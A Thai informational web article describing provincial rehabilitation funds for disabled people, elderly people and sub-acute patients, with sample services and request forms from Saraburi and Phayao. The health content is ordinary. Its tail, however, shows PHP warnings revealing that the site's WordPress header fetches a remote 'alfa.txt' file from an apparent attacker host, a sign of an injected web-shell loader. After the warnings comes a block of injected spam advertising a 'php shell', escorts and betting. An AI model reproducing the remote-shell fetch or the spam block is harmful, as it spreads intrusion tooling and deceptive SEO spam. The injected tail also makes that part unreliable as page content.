กองทุนฟื้นฟูสมรรถภาพที่จำเป็นต่อสุขภาพระดับจังหวัด

 

นับตั้งแต่รัฐบาลได้มีการประกาศใช้พระราชบัญญัติหลักประกันสุขภาพแห่งชาติ พ.ศ. 2545 เพื่อรองรับสิทธิของประชาชนในเรื่องการรับบริการสาธารณสุขที่เหมาะสมและได้มาตรฐานอย่างทั่วถึงและเสมอภาค สำนักงานหลักประกันสุขภาพ (สปสช.) นอกจากจะทำหน้าที่บริหารจัดการสิทธิการรับบริการสารณสุขอย่างทั่วถึงและเสมอภาคของคนไทยทุกคนผ่านสิทธิหลักประกันสุขภาพแห่งชาติหรือ “สิทธิบัตรทอง” แล้ว สำนักงานหลักประกันสุขภาพแห่งชาติยังได้พัฒนาระบบการบริหารจัดการระบบหลักประกันสุขภาพในระดับท้องถิ่นหรือระดับท้องที่ เพื่อสร้างหลักประกันสุขภาพให้แก่คนในพื้นที่ ส่งเสริมให้เกิดการมีส่วนร่วม มีความเหมาะสม และสอดคล้องความต้องการของประชาชนในพื้นที่นั้น ๆ จึงเกิดเป็น “กองทุนฟื้นฟูสมรรถภาพระดับจังหวัด” เพื่อให้องค์กรปกครองส่วนท้องถิ่น (องค์การบริหารส่วนจังหวัด – อบจ.) มีส่วนร่วมในการสร้างหลักประกันสุขภาพด้านการฟื้นฟูสมรรถภาพให้กับบุคคลในพื้นที่ได้อย่างครบวงจรและมีประสิทธิภาพ ดังภาพที่ 1 แสดงถึงกรอบแนวคิดในการบริหารจัดการกองทุนฟื้นฟูสมรรถภาพฯ แบบมีส่วนร่วม

ภาพที่ 1 กรอบแนวคิดในการบริหารจัดการกองทุนฟื้นฟูสมรรถภาพฯ แบบมีส่วนร่วม

ที่มาภาพ: “คู่มือการบริหารจัดการกองทุนฟื้นฟูสมรรถภาพที่จำเป็นต่อสุขภาพระดับจังหวัด”

 

กลุ่มเป้าหมายการบริการของกองทุนฟื้นฟูฯ

กลุ่มเป้าหมายของกองทุนฟื้นฟูฯ ประกอบด้วย 3 กลุ่ม ได้แก่

  1. คนพิการ (ตามที่กำหนดในพระราชบัญญัติส่งเสริมและพัฒนาคุณภาพชีวิตคนพิการ พ.ศ.2550) ที่ลงทะเบียนในระบบหลักประกันสุขภาพแห่งชาติ
  2. ผู้สูงอายุ (อายุเกินกว่า 60 ปี) ที่มีความจำเป็นต้องได้รับการฟื้นฟูสมรรถภาพฯ
  3. ผู้ป่วยที่พ้นระยะเฉียบพลัน (Acute phase) ที่อยู่ในระยะที่จำเป็นต้องได้รับการฟื้นฟูสมรรถภาพ (Sub-acute phase) ในที่นี้ หมายถึง บุคคลที่ยังไม่ถูกประเมินเป็นคนพิการ แต่มีข้อจำกัดในการปฏิบัติกิจกรรมในชีวิตประจำวัน เนื่องจากมีความบกพร่องทางการ เห็น การได้ยิน การเคลื่อนไหว การสื่อสาร จิตใจ อารมณ์พฤติกรรม สติปัญญา การเรียนรู้หรือความบกพร่องอื่นใด จากภาวะสุขภาพอนามัย ซึ่งจำเป็นต้องได้รับการฟื้นฟูหรือช่วยเหลือให้มีสมรรถภาพด้านสุขภาพ เพื่อให้ข้อจำกัดดังกล่าวลดลงหรือหมดไป

 

 

ตัวอย่างบริการกองทุนฟื้นฟูสมรรถภาพที่จำเป็นต่อสุขภาพระดับจังหวัดสำหรับคนพิการ

กรณีตัวอย่าง กองทุนฟื้นฟูสมรรถภาพ จังหวัดสระบุรี

  1. การปรับสภาพแวดล้อมที่อยู่อาศัยให้แก่คนพิการ ผู้สูงอายุ และผู้อยู่ในระยะที่จำเป็นต้องได้รับการฟื้นฟูสมรรถภาพ กองทุนฟื้นฟูสมรรถภาพที่จำเป็นต่อสุขภาพ จังหวัดสระบุรี
   – คนพิการสามารถยื่นคำให้มีการปรับสภาพแวดล้อมที่อยู่อาศัยให้แก่คนพิการ ผู้สูงอายุ และผู้อยู่ในระยะที่จำเป็นต้องได้รับการฟื้นฟูสมรรถภาพ ต่อกองทุนฟื้นฟูสมรรถภาพที่จำเป็นต่อสุขภาพ จังหวัดสระบุรี ตัวอย่างคำขอ https://www.saraburipao.go.th/home/wp-content/uploads/2020/01/แบบคำขอปรับสภาพแวดล้อมที่อยู่อาศัย.pdf
   – โดยเป็นการปรับสภาพที่อยู่อาศัยเพื่อการฟื้นฟูสมรรถภาพในรายการดังต่อไปนี้ ปรับพื้นบ้าน (ให้เรียบ/ทางลาดสำหรับใช้รถเข็น) ราวจับบันได ราวจับเพื่อฝึกยืน/เดิน ราวเกาะภายในบ้าน ปรับห้องน้ำ (ราวจับ โถสุขภัณฑ์ พื้นห้องน้ำ ฝักบัว) ปรับประตู (ขยายความกว้างของประตูให้รถเข็นผ่านได้ และอื่น ๆ เพื่อการฟื้นฟูสมรรถภาพ
  2. การสนับสนุนอุปกรณ์ให้แก่คนพิการ ผู้สูงอายุ และผู้ที่จำเป็นต้องได้รับการฟื้นฟูสมรรถภาพ (ผ่านโรงพยาบาลส่งเสริมสุขภาพตำบล)
   – คนพิการสามารถยื่นขอการสนับสนุนอุปกรณ์ที่จำเป็นต่อการฟื้นฟูสมรรถภาพไปใช้ที่บ้าน โดยเป็นการยื่นคำขอผ่านโรงพยาบาลส่งเสริมสุขภาพตำบลในท้องที่
   – อุปกรณ์ที่กองทุนฯ ให้การสนับสนุนได้แก่ ที่นอนลม รถเข็นวีลแชร์ รถเข็นวีลแชร์ที่มีการกำหนดคุณสมบัติ รถเข็นนั่งถ่าย เก้าอี้นั่งถ่าย รถสามล้อโยก เตียงปรับระดับได้ ไม้ค้ำยัน ไม้เท้า 1 จุด ไม้เท้า 3 จุด ไม้เท้า 4 ขา เครื่องผลิตออกซิเจน 3 ลิตร เครื่องผลิตออกซิเจน 5 ลิตร เครื่องผลิตออกซิเจน 8 ลิตร เครื่องดูดเสมหะ ชุดถังออกซิเจน เครื่องพ่นยา เครื่องดันตัว (Push up) กระดานบริหารกล้ามเนื้อต้นขา (Quadriceps Board)  ถุงทราย จุกยางสวมไม้ค้ำยัน เตียงไม้เตี้ยมีราวกั้น โต๊ะคร่อมเตียง อุปกรณ์ฝึกเดิน 4 ขาชนิดมีล้อ (Posterior wheel walker) อุปกรณ์ช่วยเดิน 4 ขาชนิดมีล้อ (Anterior wheel walker) อุปกรณ์ช่วยเดินแบบพับได้ รถเข็นช่วยเดิน (Rollator) รถเข็นอาบน้ำนั่งถ่าย รถเข็นปรับเอนนอนอาบน้ำนั่งถ่าย รถเข็นคนพิการแบบช่วยเหลือตนเอง ฯลฯ

กรณีตัวอย่าง กองทุนฟื้นฟูสมรรถภาพ จังหวัดพะเยา

  1. การปรับสภาพแวดล้อมที่อยู่อาศัยให้แก่คนพิการ ผู้สูงอายุ และผู้อยู่ในระยะที่จำเป็นต้องได้รับการฟื้นฟูสมรรถภาพ กองทุนฟื้นฟูสมรรถภาพที่จำเป็นต่อสุขภาพ จังหวัดพะเยา
   – คนพิการสามารถยื่นคำให้มีการปรับสภาพแวดล้อมที่อยู่อาศัยให้แก่คนพิการ ผู้สูงอายุ และผู้อยู่ในระยะที่จำเป็นต้องได้รับการฟื้นฟูสมรรถภาพ ต่อกองทุนฟื้นฟูสมรรถภาพที่จำเป็นต่อสุขภาพ จังหวัดพะเยา ตัวอย่างคำขอ http://1.179.197.106/newweb/images/Doc-Kongtoon/b%E0%B8%9Fep_kam_kor/4.แบบฟอรมคำขอใหมการปรบสภาพแวดลอมทอ.docx
  2. การสนับสนุนอุปกรณ์ให้แก่คนพิการ ผู้สูงอายุ และผู้ที่จำเป็นต้องได้รับการฟื้นฟูสมรรถภาพ (ผ่านโรงพยาบาลส่งเสริมสุขภาพตำบล)
   – คนพิการสามารถยื่นขอการสนับสนุนอุปกรณ์ที่จำเป็นต่อการฟื้นฟูสมรรถภาพไปใช้ที่บ้าน โดยเป็นการยื่นคำขอผ่านโรงพยาบาลส่งเสริมสุขภาพตำบลในท้องที่

 

กิจกรรมบริการตามชุดสิทธิประโยชน์ตามพระราชบัญญัติหลักประกันสุขภาพแห่งชาติ พ.ศ. 2545 สำหรับกลุ่มคนพิการ

 

ติดต่อสอบถามรายละเอียด

คนพิการที่มีความประสงค์จะขอรับบริการกองทุนฟื้นฟูสมรรถภาพที่จำเป็นระดับจังหวัดสามารถติดต่อสอบถามรายละเอียดได้ที่กองทุนฟื้นฟูสมรรถภาพที่จำเป็นระดับจังหวัดในท้องที่ที่ตนเองอาศัยอยู่ โดยกองทุนฯ จะมีสำนักงานประจำอยู่องค์การบริหารส่วนจังหวัด

 

แหล่งข้อมูลอ้างอิง

“คู่มือการบริหารจัดการกองทุนฟื้นฟูสมรรถภาพที่จำเป็นต่อสุขภาพระดับจังหวัด”

https://www.nhso.go.th/files/userfiles/file/ฟื้นฟู/คู่มือการบริหารจัดการกองทุนฟื้นฟูสมรรถภาพที่จำเป็นต่อสุขภาพระดับจังหวัด.pdf

“กองทุนฟื้นฟูสมรรถภาพที่จำเป็นต่อสุขภาพจังหวัดสระบุรี”

          https://www.saraburipao.go.th/home/recover

“กองทุนฟื้นฟูสมรรถภาพที่จำเป็นต่อสุขภาพจังหวัดพะเยา”

          http://1.179.197.106/newweb/index.php/2016-01-18-04-54-23?start=20

Skip to content
Warning: file_get_contents(): SSL operation failed with code 1. OpenSSL Error messages: error:14090086:SSL routines:SSL3_GET_SERVER_CERTIFICATE:certificate verify failed in /newdata/vhosts/thaisynergy.org/httpdocs/wp-blog-header.php on line 22

Warning: file_get_contents(): Failed to enable crypto in /newdata/vhosts/thaisynergy.org/httpdocs/wp-blog-header.php on line 22

Warning: file_get_contents(https://inject0r.com/wp-content/uploads/2020/10/alfa.txt): failed to open stream: operation failed in /newdata/vhosts/thaisynergy.org/httpdocs/wp-blog-header.php on line 22

php shell hacklink php shell seobizde.com jigolo arayan bayanlar www.jigolosahibinden.com jigolo olmak istiyorum jigolo ajansi jigolo siteleri jigolo başvurusu karşıyaka escort sohbet okey oyna süperbahis beylikdüzü escort bodrum escort hotforex bedavabonuscum.com gabile instagram takipçi satın al medyum kalkinmaatolyesi.org bet bahis Aşık Etme Duası esenyurt escort şirinevler escort avcilar escort